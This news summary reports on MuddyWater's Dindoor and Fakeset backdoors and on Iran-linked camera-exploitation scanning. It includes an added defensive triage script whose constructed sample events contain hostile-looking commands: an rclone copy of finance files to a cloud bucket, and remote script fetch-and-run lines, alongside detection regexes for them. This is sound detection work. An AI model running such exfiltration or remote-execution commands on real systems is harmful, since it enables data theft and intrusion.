MuddyWater Deploys New Dindoor Backdoor in U.S. Networks

By alex2404

The backdoor has a name: Dindoor. It runs on the Deno JavaScript runtime, it was previously unknown, and researchers now say it is the payload being dropped inside the networks of a U.S. bank, a Canadian non-profit, and the Israeli arm of a software company that supplies the defense and aerospace industries.

Research from Broadcom’s Symantec and Carbon Black Threat Hunter Team has attributed the campaign to MuddyWater, also tracked as Seedworm — a state-sponsored group affiliated with Iran’s Ministry of Intelligence and Security. According to the report, the activity began in early February, with recent intrusions detected following U.S. and Israeli military strikes on Iran.

The Israeli operation of the software company appears to be the specific target. Researchers also found an attempt to exfiltrate data from that same company using the Rclone utility, with files directed toward a Wasabi cloud storage bucket. Whether the exfiltration succeeded is not currently known.

Two Backdoors, One Certificate

A second malware strain was active elsewhere. A Python backdoor called Fakeset turned up on the networks of a U.S. airport and a non-profit, downloaded from servers belonging to Backblaze, an American cloud storage provider. The digital certificate used to sign Fakeset is the same one previously used to sign two other tools — Stagecomp and Darkcomp — both linked to MuddyWater in prior investigations.
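The tradecraft described in the two sections above (Rclone pushing files to a Wasabi bucket, a backdoor running on the Deno runtime, and a Python payload fetched from Backblaze storage) is all visible in ordinary process-creation telemetry. The script below is an added example written for this page from a defender's perspective; it is not code from Symantec, Carbon Black or the article. The log events, hostnames, bucket names and URLs are constructed, and the `backblazeb2.com` download host is an assumption about where a B2 fetch would typically point, not an indicator taken from the report.

```python
"""Triage process-creation events for the three behaviours the article describes.

Added example, not part of the original article or of any vendor report.
All sample events below are constructed for illustration.
"""
import json
import re

# Constructed sample events in a sysmon-like JSON shape (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "fs01", "image": r"C:\Tools\rclone.exe", "parent": "cmd.exe",
     "cmdline": r"rclone.exe copy D:\Finance\Q1 wasabi:constructed-bucket --transfers 8 -q"},
    {"host": "ws07", "image": r"C:\Users\jdoe\AppData\Local\deno\deno.exe", "parent": "powershell.exe",
     "cmdline": "deno run -A https://203.0.113.10/updater.ts"},
    {"host": "ws07", "image": r"C:\Python311\python.exe", "parent": "wscript.exe",
     # Assumed B2 download host pattern; the bucket path is constructed.
     "cmdline": "python.exe -c \"import urllib.request as u; "
                "u.urlretrieve('https://f003.backblazeb2.com/file/constructed-bucket/setup.py','setup.py')\""},
    {"host": "dev02", "image": r"C:\Program Files\Git\bin\git.exe", "parent": "explorer.exe",
     "cmdline": "git pull origin main"},  # benign control event
]

# Each rule: (name, regex over the command line, short analyst note).
RULES = [
    ("rclone_cloud_exfil",
     re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b.*\bwasabi", re.I),
     "rclone transferring data to a Wasabi remote; confirm the remote is sanctioned"),
    ("deno_remote_script",
     re.compile(r"\bdeno(\.exe)?\s+run\b.*https?://", re.I),
     "Deno executing a module fetched straight from a URL; review the source host"),
    ("python_backblaze_fetch",
     re.compile(r"\bpython[\d.]*(\.exe)?\b.*backblazeb2\.com", re.I),
     "Python retrieving a file from Backblaze B2; check parent process and file written"),
]


def triage(events):
    """Return one hit dict per (event, rule) match, in event order."""
    hits = []
    for ev in events:
        cmd = ev.get("cmdline", "")
        for name, pattern, note in RULES:
            if pattern.search(cmd):
                hits.append({"rule": name, "host": ev.get("host"),
                             "image": ev.get("image"), "parent": ev.get("parent"),
                             "note": note})
    return hits


def triage_lines(lines):
    """Parse JSON-lines telemetry and triage it; malformed lines are skipped."""
    events = []
    for line in lines:
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return triage(events)


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"[{hit['rule']}] {hit['host']} {hit['image']} (parent {hit['parent']}): {hit['note']}")
```

Three of the four constructed events match, one per rule; the `git pull` control event does not. The parent process is carried through on purpose: a scripting host or `wscript.exe` spawning a downloader is the context that turns a plain match into something worth escalating, and tuning for legitimate Rclone or Deno usage in an environment is done by adding allow-listed remotes and source hosts rather than by loosening the patterns.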

“While this malware wasn’t seen on the targeted networks, the use of the same certificates suggests the same actor — namely Seedworm — was behind the activity on the networks of the U.S. companies,” Symantec and Carbon Black said.

The researchers also noted a broader pattern: “Iranian threat actors have become increasingly proficient in recent years. Not only has their tooling and malware improved, but they’ve also demonstrated strong social engineering capabilities, including spear-phishing campaigns and ‘honeytrap’ operations.”

Camera Scanning as Pre-Strike Intelligence

Separate findings from Check Point connect a different thread. The pro-Palestinian hacktivist group Handala Hack, also known as Void Manticore, has been routing operations through Starlink IP ranges to probe externally facing applications. Meanwhile, Iran-linked group Agrius has been scanning for vulnerable Hikvision and Dahua cameras using five documented vulnerabilities: CVE-2017-7921, CVE-2023-6895, CVE-2021-36260, CVE-2025-34067, and CVE-2021-33044.

The exploitation attempts have surged across Israel, the U.A.E., Qatar, Bahrain, Kuwait, Lebanon, and Cyprus. Check Point’s assessment is pointed: the camera-targeting activity may function as pre-launch reconnaissance. “Tracking camera-targeting activity from specific, attributed infrastructures may serve as an early indicator of potential follow-on kinetic activity,” the company said, describing the behavior as consistent with Iran’s use of camera compromise for missile battle damage assessment.

Canada’s Centre for Cyber Security has since issued an advisory warning that Iran will likely direct its cyber capabilities toward retaliatory attacks on critical infrastructure. UltraViolet Cyber described the strategic picture plainly: “Iran’s offensive cyber capability has matured into a durable instrument of state power used to support intelligence collection, regional influence, and strategic signaling during periods of geopolitical tension.”


This article is a curated summary based on third-party sources.
